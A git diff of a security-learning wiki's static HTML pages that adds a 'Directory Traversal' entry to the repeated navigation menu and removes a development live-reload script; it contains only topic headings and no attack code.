          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Enumerate D - - diff --git a/docs/Post Exploitation/Enumeration/Windows/index.html b/docs/Post Exploitation/Enumeration/Windows/index.html index b446a960..fe8342de 100644 --- a/docs/Post Exploitation/Enumeration/Windows/index.html +++ b/docs/Post Exploitation/Enumeration/Windows/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -181,22 +181,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/index.html b/docs/Post Exploitation/Enumeration/index.html index a59b4fa4..e7ef8807 100644 --- a/docs/Post Exploitation/Enumeration/index.html +++ b/docs/Post Exploitation/Enumeration/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Post Exploitation/Pivoting/SSH Tunneling.html b/docs/Post Exploitation/Pivoting/SSH Tunneling.html index deec28d8..30c1c35c 100644 --- a/docs/Post Exploitation/Pivoting/SSH Tunneling.html +++ b/docs/Post Exploitation/Pivoting/SSH Tunneling.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
